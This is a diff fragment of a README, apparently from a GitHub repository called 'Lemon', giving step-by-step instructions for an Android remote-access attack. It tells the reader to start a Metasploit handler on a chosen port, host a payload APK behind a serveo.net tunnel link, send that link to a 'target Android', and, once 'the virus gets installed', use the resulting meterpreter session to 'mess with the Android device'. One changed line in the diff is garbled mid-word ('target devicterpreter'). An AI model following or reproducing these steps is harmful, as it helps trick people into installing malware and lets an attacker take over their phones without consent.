Viper-Gamer/Lemon/README.md

 4.Type "sh Handler" and wait for the Handler to start, then type "set LPORT xxxx" Put your port instead of xxxx, and finally type "run"   [NEW SESSION]

-5.Now, put your payload's name after the link that you got after running "sh ssh" [For Example : lente.serveo.net/Name.apk] and send the link to the target Android, once the virus gets installed in the target device, you will see a meterpreter session opening, wait for a few seconds.
+5.Now, put your payload's name after the link that you got after running "sh ssh" [For Example : lente.serveo.net/Name.apk] and send the link to the target Android, once the virus gets installed in the target devicterpreter
-  Type "?" and press enter.
-Now you can mess with the Android device using the commnands listed.